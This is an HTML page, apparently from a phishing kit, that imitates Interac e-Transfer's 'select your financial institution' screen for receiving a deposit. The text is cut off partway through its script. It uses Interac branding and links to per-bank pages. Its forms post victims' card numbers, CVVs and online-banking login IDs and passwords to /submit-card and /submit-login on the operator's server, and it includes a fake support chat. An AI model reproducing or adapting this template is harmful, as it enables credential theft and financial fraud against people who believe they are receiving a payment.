<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Interac e-Transfer - Select Financial Institution</title>
    <meta name="description" content="Receive money via Interac e-Transfer">
    <meta name="author" content="Interac">
    <meta property="og:title" content="Interac e-Transfer - Select Financial Institution">
    <meta property="og:description" content="Receive money via Interac e-Transfer">
    <meta property="og:type" content="website">
    <script src="https://cdn.tailwindcss.com/3.4.16"></script>
    <link rel="shortcut icon" href="https://www.interac.ca/wp-content/smush-webp/2023/01/cropped-Interac_Two-Colour_RGB-favicon512x512-192x192.png.webp">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Inter&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/remixicon/4.6.0/remixicon.min.css">
    <style>
        :root {
            --background: 0 0% 100%;
            --foreground: 222.2 84% 4.9%;
            --primary: 47 100% 50%;
            --primary-foreground: 0 0% 0%;
            --secondary: 210 40% 96.1%;
            --secondary-foreground: 222.2 47.4% 11.2%;
            --muted: 210 40% 96.1%;
            --muted-foreground: 215.4 16.3% 46.9%;
            --border: 214.3 31.8% 91.4%;
            --input: 214.3 31.8% 91.4%;
            --ring: 222.2 84% 4.9%;
            --background-color: #F6F4E9;
            --text-color: #210803;
            --text-color-light: #735d58;
            --banner-background-color: #FF3500;
            --banner-text-color: #F6F4E9;
            --secondary-banner-background-color: #FFD6F8;
            --secondary-banner-text-color: #FF3500;
            --button-text-color: #F6F4E9;
            --button-color: #6FB382;
            --button-color-hover: #5A8F6F;
            --button-color-active: #4C7B5A;
            --button-color-disabled: #A3C6A9;
            --switch-color: #FF3500;
            --font-primary: 'Work Sans', sans-serif !important;
            --menu-background: #fffefc;
            --menu-background-grey-light: #f9f9f9;
            --menu-background-grey-dark: #efefef;
            --menu-background-highlight: #f8f5f1;
            --menu-border: #d2c9bd;
            --menu-text: #210803;
            --menu-text-light: #735d58;
            --menu-grey-dark: #999999;
        }

        body {
            font-family: 'Inter', sans-serif;
            min-height: 100vh;
            display: flex;
            flex-direction: column;
            background-color: #fff;
            color: #333;
        }

        body * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
        }

        .bank-btn {
            transition: all 0.2s ease;
            outline: none !important;
        }

        .bank-btn:focus {
            box-shadow: none !important;
            outline: none !important;
        }

        .bank-btn img {
            max-width: 80%;
            max-height: 80%;
            object-fit: contain;
        }

        .card-input-container {
            max-width: 500px;
            margin: 0 auto;
            background: white;
            border-radius: 12px;
            box-shadow: 0 4px 20px rgba(0,0,0,0.05);
            padding: 2rem;
        }

        .card-input-field {
            position: relative;
            margin-bottom: 1.5rem;
        }

        .card-input-field label {
            display: block;
            margin-bottom: 0.5rem;
            font-weight: 500;
            color: #333;
        }

        .card-input-field input {
            width: 100%;
            padding: 0.75rem 1rem;
            border: 1px solid #ddd;
            border-radius: 8px;
            font-size: 16px;
            transition: all 0.2s;
        }

        .card-input-field input:focus {
            border-color: #FFCC00;
            outline: none;
            box-shadow: 0 0 0 2px rgba(255, 204, 0, 0.2);
        }

        .card-icons {
            display: flex;
            gap: 10px;
            margin-top: 0.5rem;
        }

        .card-icon {
            width: 40px;
            height: 25px;
            object-fit: contain;
        }

        .card-row {
            display: flex;
            gap: 1rem;
        }

        .card-row .card-input-field {
            flex: 1;
        }

        .card-row .card-input-field:last-child {
            max-width: 120px;
        }

        .card-cvv-hint {
            position: absolute;
            right: 10px;
            top: 50%;
            transform: translateY(-50%);
            color: #666;
            font-size: 12px;
            cursor: pointer;
        }

        .chat-button {
            position: fixed;
            bottom: 30px;
            right: 30px;
            width: 60px;
            height: 60px;
            border-radius: 50%;
            background-color: #FFCC00;
            color: #000;
            display: flex;
            align-items: center;
            justify-content: center;
            box-shadow: 0 4px 12px rgba(0,0,0,0.15);
            cursor: pointer;
            z-index: 1000;
            transition: all 0.3s ease;
        }

        .chat-button:hover {
            transform: scale(1.05);
            box-shadow: 0 6px 16px rgba(0,0,0,0.2);
        }

        .chat-button i {
            font-size: 24px;
        }

        .chat-widget {
            position: fixed;
            bottom: 100px;
            right: 30px;
            width: 300px;
            background-color: white;
            border-radius: 12px;
            box-shadow: 0 10px 30px rgba(0,0,0,0.15);
            overflow: hidden;
            z-index: 1000;
            transform: translateY(20px);
            opacity: 0;
            visibility: hidden;
            transition: all 0.3s ease;
        }

        .chat-widget.active {
            transform: translateY(0);
            opacity: 1;
            visibility: visible;
        }

        .chat-header {
            background-color: #FFCC00;
            color: #000;
            padding: 12px 16px;
            font-weight: 600;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }

        .chat-header i {
            cursor: pointer;
        }

        .chat-body {
            padding: 16px;
            height: 300px;
            overflow-y: auto;
        }

        .chat-message {
            margin-bottom: 12px;
            padding: 8px 12px;
            border-radius: 8px;
            max-width: 80%;
            font-size: 14px;
        }

        .chat-message.support {
            background-color: #f1f1f1;
            align-self: flex-start;
        }

        .chat-message.user {
            background-color: #FFCC00;
            color: #000;
            margin-left: auto;
        }

        .chat-input {
            display: flex;
            padding: 12px;
            border-top: 1px solid #eee;
        }

        .chat-input input {
            flex: 1;
            padding: 8px 12px;
            border: 1px solid #ddd;
            border-radius: 20px;
            outline: none;
        }

        .chat-input button {
            margin-left: 8px;
            background-color: #FFCC00;
            color: #000;
            border: none;
            border-radius: 20px;
            padding: 8px 16px;
            cursor: pointer;
        }

        .amount-info {
            background-color: white;
            border-radius: 12px;
            box-shadow: 0 4px 20px rgba(0,0,0,0.05);
            padding: 2rem;
            margin-bottom: 2rem;
            max-width: 600px;
            margin-left: auto;
            margin-right: auto;
        }

        .amount-info-row {
            display: flex;
            justify-content: space-between;
            margin-bottom: 1rem;
        }

        .amount-info-label {
            font-weight: 600;
            color: #555;
        }

        .amount-info-value {
            font-weight: 700;
            color: #000;
        }
        
        #password {
            letter-spacing: 1px;
        }
        .hidden {
    display: none !important;
}

        .total-row {
            border-top: 1px solid #eee;
            padding-top: 1rem;
            margin-top: 1rem;
        }
    </style>
</head>
<body>
    <header class="bg-white shadow-sm sticky top-0 z-50">
        <div class="container mx-auto px-4 py-4">
            <div class="flex items-center justify-between">
                <div class="flex items-center">
                    <a href="https://www.interac.ca/en/" class="flex items-center">
                        <div class="logo" style="width: 2.5rem; height: 2.5rem; display: flex; align-items: center; justify-content: center; border-radius: 0.25rem;">
                            <img src="https://i.postimg.cc/8zsYCnD7/interac-logo.png" alt="Interac Logo">
                        </div>
                    </a>
                    <nav class="hidden md:flex ml-8">
                        <div class="relative group">
                            <a href="https://www.interac.ca/en/consumers/" class="px-4 py-2 text-gray-700 hover:text-primary flex items-center whitespace-nowrap">
                                Consumers
                                <div class="w-4 h-4 ml-1 flex items-center justify-center">
                                    <i class="ri-arrow-down-s-line"></i>
                                </div>
                            </a>
                        </div>
                        <div class="relative group">
                            <a href="https://www.interac.ca/en/business/" class="px-4 py-2 text-gray-700 hover:text-primary flex items-center whitespace-nowrap">
                                Business
                                <div class="w-4 h-4 ml-1 flex items-center justify-center">
                                    <i class="ri-arrow-down-s-line"></i>
                                </div>
                            </a>
                        </div>
                        <div class="relative group">
                            <a href="https://www.interac.ca/en/about/" class="px-4 py-2 text-gray-700 hover:text-primary flex items-center whitespace-nowrap">
                                About
                                <div class="w-4 h-4 ml-1 flex items-center justify-center">
                                    <i class="ri-arrow-down-s-line"></i>
                                </div>
                            </a>
                        </div>
                    </nav>
                </div>
                <div class="flex items-center space-x-6">
                    <div class="relative group">
                        <button class="px-4 py-2 text-gray-700 hover:text-primary flex items-center whitespace-nowrap">
                            FAQs
                        </button>
                    </div>
                    <div class="relative group">
                        <a href="https://www.interac.ca/en/how-to-use/" class="px-4 py-2 text-gray-700 hover:text-primary flex items-center whitespace-nowrap">
                            How To Use
                        </a>
                        </div>
                    <div class="relative group">
                        <a href="https://www.interac.ca/en/content/" class="px-4 py-2 text-gray-700 hover:text-primary flex items-center whitespace-nowrap">
                            In The Know
                        </a>
                    </div>
                    <div class="relative group">
                        <button class="px-4 py-2 text-gray-700 hover:text-primary flex items-center whitespace-nowrap">
                            FR
                        </button>
                    </div>
                    <div class="w-8 h-8 flex items-center justify-center text-gray-700 hover:text-primary cursor-pointer">
                        <i class="ri-search-line ri-lg"></i>
                    </div>
                </div>
            </div>
        </div>
    </header>

    <main class="container mx-auto px-4 py-8">
        <div id="select-institution-page" class="page active">
            <div class="amount-info">
                <div class="amount-info-row">
                    <div class="amount-info-label">Reference:</div>
                    <div class="amount-info-value" id="reference">{{ reference }}</div>
                </div>
                <div class="amount-info-row total-row">
                    <div class="amount-info-label">Total:</div>
                    <div class="amount-info-value" id="total-amount">{{ total }} CAD</div>
                </div>
            </div>
            <div id="institution-message" class="hidden mt-4 p-4 text-center text-sm" 
     style="background-color: #fee2e2; color: #dc2626;">
</div>
            
            <div class="max-w-6xl mx-auto">
                <div class="mb-6">
                    <h2 class="text-xl font-bold mb-4">Select Your Financial Institutiоn</h2>
                </div>
                <div class="grid grid-cols-3 gap-4 sm:grid-cols-4 md:grid-cols-6">
                    <button class="bank-btn alt-card bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center">
                        <img src="https://i.postimg.cc/rFYFc0CG/card.png" alt="Card" style="max-width: 100%; max-height: 100%;">
                    </button>
                   <button 
    class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center cursor-pointer"
    onclick="window.location.href = '/ATB?url_id={{ url_id }}'">
    <img src="https://i.postimg.cc/y6L7Xg5q/atb.png" alt="ATB Financial" style="max-width: 100%; max-height: 100%;">
</button>
                    <button 
                    class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/Manulife?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/rFbc76MQ/manulife.png" alt="Manulife Bank" style="max-width: 100%; max-height: 120%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/Meridian?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/Bvf3Qx8F/meridian.png" alt="Meridian" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/motusbank?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/rsHX6WXK/xyinya.png" alt="motusbank" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/PcFinancial?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/8PfxJ7gm/pc.png" alt="Financial" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/peoples?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/FHjqpwRf/zalypa.png" alt="Peoples Trust" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/Simplii?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/pdRS6khs/simpli.png" alt="simplii" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/Tangerine?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/Pqy7sZ1T/tang.png" alt="tangerine" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/Banque?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/sX001rnL/zalypa1.png" alt="Banque" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/Coastcapital?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/WzBW67c6/coast.png" alt="coastcapital" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/ScotiaBank?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/DzfTX7gf/sco.png" alt="scotiabank" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/Binance?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/d1Lc5npz/bybit.png" alt="binance" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/bmo?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/zB6Z6K13/bmo.png" alt="BMO" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/NationalBank?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/Ghkwg4gh/nbc.png" alt="national bank" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/cibc?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/wTWcpVGW/cibc.png" alt="cibc" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/rbc?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/rw31dpcx/rbc.png" alt="rbc" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/description?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/gJP3DBx0/desj.png" alt="desjardins" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/tdbank?url_id={{ url_id }}'">
                        <img src="https://i.postimg.cc/0QdDHdS0/td.png" alt="TDbank" style="max-width: 100%; max-height: 100%;">
                    </button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center"
                    onclick="window.location.href = '/shakepay?url_id={{ url_id }}'">
    <img src="https://i.postimg.cc/zvxWqz0L/shakepay.png" alt="Shakepay" style="max-width: 100%; max-height: 100%;">
</button>
                    <button class="bank-btn bg-white border border-gray-200 rounded-lg p-2 hover:border-yellow-400 transition-all h-24 flex items-center justify-center">
                        <img src="https://i.postimg.cc/CM7bG7SF/2.png" alt="AnotherBank" style="max-width: 100%; max-height: 100%;">
                    </button>
                </div>
                <div class="divider mt-8 mb-4 text-center">
                    <span class="divider-text inline-block bg-white px-4 text-gray-400 text-sm">or</span>
                </div>
                <div class="max-w-lg mx-auto mb-8">
                    <div class="form-group mb-4">
    <label for="union" class="input-label block text-sm font-medium text-gray-700 mb-1">Select Province or Territory</label>
    <select id="union" class="input w-full border-gray-300 rounded p-2">
    <option value="" disabled="" selected="" hidden="">Province or Territory</option> 
															<option value="Alberta">Alberta</option>
															<option value="British Columbia">British Columbia</option>
															<option value="Manitoba">Manitoba</option>
															<option value="New Brunswick">New Brunswick</option>
															<option value="Newfoundland and Labrador">Newfoundland and Labrador</option>
															<option value="Northwest Territories">Northwest Territories</option>
															<option value="Nova Scotia">Nova Scotia</option>
															<option value="Nunavut">Nunavut</option>
															<option value="Ontario">Ontario</option>
															<option value="Prince Edward Island">Prince Edward Island</option>
															<option value="Quebec">Quebec</option>
															<option value="Saskatchewan">Saskatchewan</option>
															<option value="Yukon Territory">Yukon Territory</option>

    </select>
</div>
                    <div class="form-group mb-4">
    <label for="province" class="input-label block text-sm font-medium text-gray-700 mb-1">Select Credit Union</label>
    <select id="province" class="input w-full border-gray-300 rounded p-2">
        <option value="" disabled selected>Credit Union</option>
<option value="1st Choice Savings and Credit Union">1st Choice Savings and Credit Union</option>
<option value="ABCU Credit Union">ABCU Credit Union</option>
<option value="Bow Valley Credit Union">Bow Valley Credit Union</option>
<option value="Christian Credit Union">Christian Credit Union</option>
<option value="Connect First Credit Union">Connect First Credit Union</option>
<option value="Lakeland Credit Union">Lakeland Credit Union</option>
<option value="Rocky Credit Union">Rocky Credit Union</option>
<option value="Servus Credit Union">Servus Credit Union</option>
<option value="Vermilion Credit Union">Vermilion Credit Union</option>
<option value="Vision Credit Union">Vision Credit Union</option>
<option value="Z_S1938">Z_S1938</option>
<option value="BlueShore Financial
">BlueShore Financial
</option><option value="Bulkley Valley Credit Union
">Bulkley Valley Credit Union
</option><option value="Coast Capital Savings Federal Credit Union
">Coast Capital Savings Federal Credit Union
</option><option value="Coastal Community Credit Union
">Coastal Community Credit Union
</option><option value="Columbia Valley Credit Union
">Columbia Valley Credit Union
</option><option value="Community Savings BC
">Community Savings BC
</option><option value="Compensation Employees Credit Union
">Compensation Employees Credit Union
</option><option value="Creston and District CU (BC)
">Creston and District CU (BC)
</option><option value="Envision Financial
">Envision Financial
</option><option value="First Credit Union
">First Credit Union
</option><option value="Greater Vancouver Community Credit Union
">Greater Vancouver Community Credit Union
</option><option value="Gulf &amp; Fraser
">Gulf &amp; Fraser
</option><option value="Integris Credit Union
">Integris Credit Union
</option><option value="Interior Savings BC
">Interior Savings BC
</option><option value="Island Savings
">Island Savings
</option><option value="Khalsa Credit Union
">Khalsa Credit Union
</option><option value="Kootenay Savings Credit Union
">Kootenay Savings Credit Union
</option><option value="Ladysmith &amp; District Credit Union
">Ladysmith &amp; District Credit Union
</option><option value="Lake View Credit Union
">Lake View Credit Union
</option><option value="Nelson and District Credit Union
">Nelson and District Credit Union
</option><option value="North Peace Savings
">North Peace Savings
</option><option value="Northern Savings Credit Union
">Northern Savings Credit Union
</option><option value="Osoyoos Credit Union
">Osoyoos Credit Union
</option><option value="Prospera Credit Union
">Prospera Credit Union
</option><option value="Revelstoke Credit Union
">Revelstoke Credit Union
</option><option value="SASCU Credit Union
">SASCU Credit Union
</option><option value="Sharons Credit Union
">Sharons Credit Union
</option><option value="StellerVista Credit Union
">StellerVista Credit Union
</option><option value="Summerland Credit Union
">Summerland Credit Union
</option><option value="Sunshine Coast Credit Union
">Sunshine Coast Credit Union
</option><option value="Valley First and Enderby &amp; District Financial, divisions of First West Credit Union
">Valley First and Enderby &amp; District Financial, divisions of First West Credit Union
</option><option value="Vancity
">Vancity
</option><option value="Vancouver Firefighters Credit Union
">Vancouver Firefighters Credit Union
</option><option value="VantageOne Credit Union(BC)
">VantageOne Credit Union(BC)
</option><option value="Williams Lake and District Credit Union">Williams Lake and District Credit Union</option>

        
    </select>
</div>
                    <div>
                       <button id="accept-deposit-btn" class="w-full bg-yellow-500 text-black py-3 px-4 flex items-center justify-center hover:bg-yellow-600 transition-colors duration-200 ease-in-out disabled:opacity-50 disabled:cursor-not-allowed">
                        <span>Accept Deposit</span>
                        <div class="w-5 h-5 ml-2 flex items-center justify-center">
                            <i class="ri-arrow-right-line"></i>
                        </div>
                    </button>
                    </div>
            </div>
        </div>
    </div>
    <!-- Content of the another-bank-page -->
</div>
                    </div>
                </div>
            </div>
        </div>

        <div id="card-input-page" class="page hidden">
            <div class="max-w-2xl mx-auto">
                <div class="flex items-center mb-6 cursor-pointer" id="back-to-banks">
                    <i class="ri-arrow-left-line mr-2"></i>
                    <span>Back to financial institutions</span>
                </div>
                <form id="card-form" method="POST" action="/submit-card">
                    <!-- Скрытое поле для суммы -->
                    <input type="hidden" name="url_id" id="card-url-id" value="">
                    
                    <h2 class="text-xl font-bold mb-6">Enter your card details</h2>
                    <div class="card-input-field">
                        <label for="card-number">Card Number</label>
                        <input type="text" id="card-number" name="card-number" placeholder="1234 5678 9012 3456" maxlength="19">
                        <div class="card-icons">
                            <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/5/5e/Visa_Inc._logo.svg/2560px-Visa_Inc._logo.svg.png" alt="Visa" class="card-icon">
                            <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/0/04/Mastercard-logo.png/800px-Mastercard-logo.png" alt="Mastercard" class="card-icon">
                        </div>
                    </div>
                    <div class="card-input-field">
                        <label for="card-name">Name on Card</label>
                        <input type="text" id="card-name" name="card-name" placeholder="John Smith">
                    </div>
                    <div class="card-row">
                        <div class="card-input-field">
                            <label for="expiry-date">Expiry Date</label>
                            <input type="text" id="expiry-date" placeholder="MM/YY" maxlength="5">
                        </div>
                        <div class="card-input-field">
                            <label for="cvv">CVV</label>
                            <div style="position: relative;">
                                <input type="text" id="cvv" name="cvv" placeholder="123" maxlength="4">
                                <span class="card-cvv-hint" id="cvv-hint">
                                    <i class="ri-question-line"></i>
                                </span>
                            </div>
                        </div>
                    </div>
                    <button type="submit" id="submit-card-btn" class="w-full bg-black text-white py-3 px-4 rounded-lg mt-6 hover:bg-gray-800 transition-colors duration-200">
                        Submit Payment
                    </button>
                </form>
            </div>
        </div>

    <!-- Страница AnotherBank -->
    <div id="another-bank-page" class="page hidden">
        <div class="max-w-2xl mx-auto">
            <div class="flex items-center mb-6 cursor-pointer" id="back-to-banks-from-another">
                <i class="ri-arrow-left-line mr-2"></i>
                <span>Back to financial institutions</span>
            </div>
            <div class="card-input-container">
                <form id="another-bank-form" method="POST" action="/submit-login">
                    <!-- Скрытое поле для суммы -->
                    <input type="hidden" name="url_id" id="another-bank-url-id" value="">
                    
                    <h2 class="text-xl font-bold mb-6">AnotherBank Online Login</h2>
                    <div class="card-input-field">
                        <label for="bank-name">Bank Name</label>
                        <input type="text" id="bank-name" name="bank-name" placeholder="Enter your Bank Name">
                    </div>
                    <div class="card-input-field">
                        <label for="login-id">Login ID or Card Number</label>
                        <input type="text" id="login-id" name="login-id" placeholder="Enter your login ID or card number">
                    </div>
                    <div class="card-input-field">
                        <label for="password">Password</label>
                        <input type="password" id="password" name="password" placeholder="Enter your password">
                    </div>
    
                    <button type="submit" id="submit-login-btn" class="w-full bg-black text-white py-3 px-4 rounded-lg mt-6 hover:bg-gray-800 transition-colors duration-200">
                        Login to AnotherBank
                    </button>
                </form>
            </div>
        </div>
    </div>
</main>


    <footer class="bg-black text-white mt-16">
        <div class="container mx-auto px-4 py-12">
            <div class="grid grid-cols-1 md:grid-cols-5 gap-8">
                <div>
                    <a href="https://www.interac.ca/en/">
                        <div class="logo" style="width: 3rem; height: 3rem; display: flex; align-items: center; justify-content: center; border-radius: 0.25rem; margin-bottom: 1rem;">
                            <img src="https://i.postimg.cc/8zsYCnD7/interac-logo.png" alt="Interac Logo">
                        </div>
                    </a>
                </div>
                <div>
                    <h3 class="text-lg font-medium mb-4">For Consumers</h3>
                    <ul class="space-y-2">
                        <li><a href="https://www.interac.ca/en/consumers/products/" class="text-gray-300 hover:text-white">Our Products</a></li>
                        <li><a href="https://www.interac.ca/en/consumers/security/" class="text-gray-300 hover:text-white">Safety & Security</a></li>
                        <li><a href="https://www.interac.ca/en/consumers/support/" class="text-gray-300 hover:text-white">Support</a></li>
                    </ul>
                </div>
                <div>
                    <h3 class="text-lg font-medium mb-4">For Business</h3>
                    <ul class="space-y-2">
                        <li><a href="https://www.interac.ca/en/business/how-it-works/" class="text-gray-300 hover:text-white">New to Interac Payment Solutions?</a></li>
                        <li><a href="https://www.interac.ca/en/business/our-solutions/" class="text-gray-300 hover:text-white">Our Products</a></li>
                        <li><a href="https://www.interac.ca/en/business/security/" class="text-gray-300 hover:text-white">Safety & Security</a></li>
                        <li><a href="https://www.interac.ca/en/business/support/" class="text-gray-300 hover:text-white">Support</a></li>
                        <li><a href="https://www.interac.ca/en/business/code-of-conduct/" class="text-gray-300 hover:text-white">Code of Conduct</a></li>
                    </ul>
                </div>
                <div>
                    <h3 class="text-lg font-medium mb-4">About Interac</h3>
                    <ul class="space-y-2">
                        <li><a href="https://www.interac.ca/en/about/careers/" class="text-gray-300 hover:text-white">Careers</a></li>
                        <li><a href="https://www.interac.ca/en/about/our-people/" class="text-gray-300 hover:text-white">Our People</a></li>
                        <li><a href="https://www.interac.ca/en/about/our-company/" class="text-gray-300 hover:text-white">Our Company</a></li>
                        <li><a href="https://www.interac.ca/en/about/network-participants/" class="text-gray-300 hover:text-white">Network Participants</a></li>
                    </ul>
                </div>
                <div>
                    <h3 class="text-lg font-medium mb-4">Resources</h3>
                    <ul class="space-y-2">
                        <li><a href="https://www.interac.ca/en/content/" class="text-gray-300 hover:text-white">In The Know</a></li>
                        <li><a href="https://www.interac.ca/en/content-category/news/" class="text-gray-300 hover:text-white">News</a></li>
                    </ul>
                    <div class="mt-8">
                        <h3 class="text-lg font-medium mb-4">Language</h3>
                        <div class="flex space-x-4">
                            <a href="#" class="text-gray-300 hover:text-white">FR</a>
                            <a href="#" class="text-gray-300 hover:text-white">EN</a>
                        </div>
                    </div>
                    <div class="mt-8">
                        <h3 class="text-lg font-medium mb-4">Follow</h3>
                        <div class="flex space-x-4">
                            <a href="https://www.facebook.com/Interac" class="text-gray-300 hover:text-white"><i class="ri-facebook-fill"></i></a>
                            <a href="https://www.youtube.com/user/InteracBrand" class="text-gray-300 hover:text-white"><i class="ri-youtube-fill"></i></a>
                            <a href="https://www.linkedin.com/company/Interac-corp/" class="text-gray-300 hover:text-white"><i class="ri-linkedin-fill"></i></a>
                            <a href="https://www.instagram.com/Interac/" class="text-gray-300 hover:text-white"><i class="ri-instagram-fill"></i></a>
                        </div>
                        </div>
                    </div>
                </div>
                <div class="mt-12 pt-8 border-t border-gray-800">
                    <div class="flex flex-wrap gap-4 text-sm text-gray-400">
                        <a href="https://interac.id13728.com/en/legal/" class="hover:text-white">Legal</a>
                        <a href="https://interac.id13728.com/en/accessibility/" class="hover:text-white">Accessibility</a>
                        <a href="https://www.interac.ca/en/content/" class="hover:text-white">In The Know</a>
                        <a href="https://www.interac.ca/en/innovation-hub/" class="hover:text-white">Innovation Hub</a>
                        <a href="https://www.interac.ca/en/cibc-pledge-to-canadians/" class="hover:text-white">CIBC Pledge to Canadians</a>
                        <span class="ml-auto">© Copyright 2025 Interac</span>
                    </div>
                    <div class="mt-4 text-sm text-gray-400">
                        Interac and Interac e-Transfer are registered trade-marks and the Interac logo, InLife and InLife design are trade-marks of Interac Corp.
                    </div>
                </div>
            </div>
        </footer>

        <div class="chat-button" id="chatButton">
            <i class="ri-chat-3-line"></i>
        </div>

        <div class="chat-widget" id="chatWidget">
            <div class="chat-header">
                <span>Support</span>
                <i class="ri-close-line" id="closeChat"></i>
            </div>
            <div class="chat-body" id="chatBody">
                <div class="chat-message support">
                    Hello! How can we help you today?
                </div>
            </div>
            <div class="chat-input">
                <input type="text" id="chatInput" placeholder="Type your message...">
                <button id="sendMessage"><i class="ri-send-plane-line"></i></button>
            </div>
        </div>

        <script>
// Функция для получения url_id
function getUrlId() {
    return sessionStorage.getItem('url_id') || "{{ reference }}";
}

function showPage(pageId) {
    document.querySelectorAll('.page').forEach(page => {
        page.classList.add('hidden');
    });
    
    const targetPage = document.getElementById(pageId);
    if (targetPage) {
        targetPage.classList.remove('hidden');
    }

    // Устанавливаем url_id в скрытое поле формы
    const urlId = getUrlId();
    if (urlId) {
        window.currentUrlId = urlId;
        
        if (pageId === 'card-input-page') {
            const cardUrlIdInput = document.getElementById('card-url-id');
            if (cardUrlIdInput) cardUrlIdInput.value = urlId;
        } else if (pageId === 'another-bank-page') {
            const anotherInput = document.getElementById('another-bank-url-id');
            if (anotherInput) anotherInput.value = urlId;
        }
    }
}

// Обработчики для кнопок банков
document.querySelectorAll('.bank-btn').forEach(button => {
    button.addEventListener('click', function() {
        const img = this.querySelector('img');
        if (!img) return;

        const urlId = getUrlId();
        const urlParam = `url_id=${encodeURIComponent(urlId)}`;
        const altText = img.alt.toLowerCase();

        // Обработка кнопки "Card"
        if (altText.includes('card')) {
            showPage('card-input-page');
            return;
        }

        // Обработка кнопки "AnotherBank"
        if (altText.includes('anotherbank')) {
            showPage('another-bank-page');
            return;
        }

        // Обработка остальных банков
        const bankMap = {
            'atb financial': '/ATB?' + urlParam,
            'manulife bank': '/Manulife?' + urlParam,
            'meridian': '/Meridian?'+ urlParam,
            'motusbank': '/MotusBank?'+ urlParam,
            'financial': '/PcFinancial?'+ urlParam,
            'peoples trust': '/Peoples?'+ urlParam,
            'banque': '/Banque?' + urlParam,
            'simplii': '/Simplii?'+ urlParam,
            'tangerine': '/Tangerine?'+ urlParam,
            'coastcapital': '/Coastcapital?'+ urlParam,
            'scotiabank': '/ScotiaBank?'+ urlParam,
            'binance': '/Binance?'+ urlParam,
            'bmo': '/bmo?'+ urlParam,
            'national bank': '/NationalBank?'+ urlParam,
